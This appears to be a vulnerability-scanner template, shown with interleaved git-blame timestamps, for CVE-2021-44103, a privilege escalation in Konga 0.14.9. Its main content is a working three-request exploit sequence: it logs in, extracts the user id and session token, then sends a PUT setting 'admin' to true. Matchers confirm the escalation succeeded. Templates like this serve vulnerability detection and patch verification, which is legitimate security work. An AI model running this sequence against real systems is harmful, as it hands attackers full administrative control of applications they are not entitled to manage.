2022-04-01 07:39:18 +00:00
id : CVE-2021-44103
info :
2022-04-02 09:17:22 +00:00
name : KOGA 0.14.9 - Privilege Escalation
2022-04-01 07:39:18 +00:00
author : rschio
severity : high
2022-04-22 10:38:41 +00:00
description : Vertical Privilege Escalation in KONGA 0.14.9 allows attackers to higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID}
at ADMIN parameter.
2022-04-01 07:39:18 +00:00
reference :
- http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
- https://www.exploit-db.com/exploits/50521
2022-04-02 09:09:25 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44103
2022-04-01 07:39:18 +00:00
classification :
cvss-score : 8.7
cve-id : CVE-2021-44103
cwe-id : CWE-264
2022-04-02 09:09:25 +00:00
tags : cve,cve2021,konga,authenticated
2022-04-01 07:39:18 +00:00
requests :
2022-04-02 09:09:25 +00:00
- raw :
- |
POST /login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
2022-04-01 07:39:18 +00:00
2022-04-02 09:09:25 +00:00
{"password": "{{password}}", "identifier": "{{username}}" }
- |
POST /api/user/{{id}} HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Referer : {{BaseURL}}
Content-Type : application/json;charset=utf-8
{"token": "{{token}}" }
- |
PUT /api/user/{{id}} HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Referer : {{BaseURL}}
Content-Type : application/json;charset=utf-8
{"admin": "true", "passports": {"password": "{{password}}", "protocol": "local"}, "token": "{{token}}", "password_confirmation": "{{password}}" }
req-condition : true
2022-04-01 07:39:18 +00:00
matchers-condition : and
matchers :
2022-04-02 09:09:25 +00:00
- type : dsl
dsl :
2022-04-04 12:38:25 +00:00
- 'contains(body_2, "\"admin\":false")'
- 'contains(body_3, "\"admin\":true")'
2022-04-02 09:09:25 +00:00
condition : and
2022-04-01 07:39:18 +00:00
- type : word
2022-04-02 09:09:25 +00:00
part : header
2022-04-01 07:39:18 +00:00
words :
2022-04-02 09:09:25 +00:00
- "application/json"
2022-04-01 07:39:18 +00:00
2022-04-02 09:09:25 +00:00
- type : status
status :
- 200
extractors :
2022-04-01 07:39:18 +00:00
- type : regex
part : body
2022-04-02 09:09:25 +00:00
name : id
internal : true
group : 1
2022-04-01 07:39:18 +00:00
regex :
2022-04-04 12:38:25 +00:00
- '"id":([0-9]+)'
2022-04-01 07:39:18 +00:00
2022-04-02 09:09:25 +00:00
- type : regex
part : body
name : token
internal : true
group : 1
regex :
2022-04-04 12:38:25 +00:00
- '"token":"(.*)"'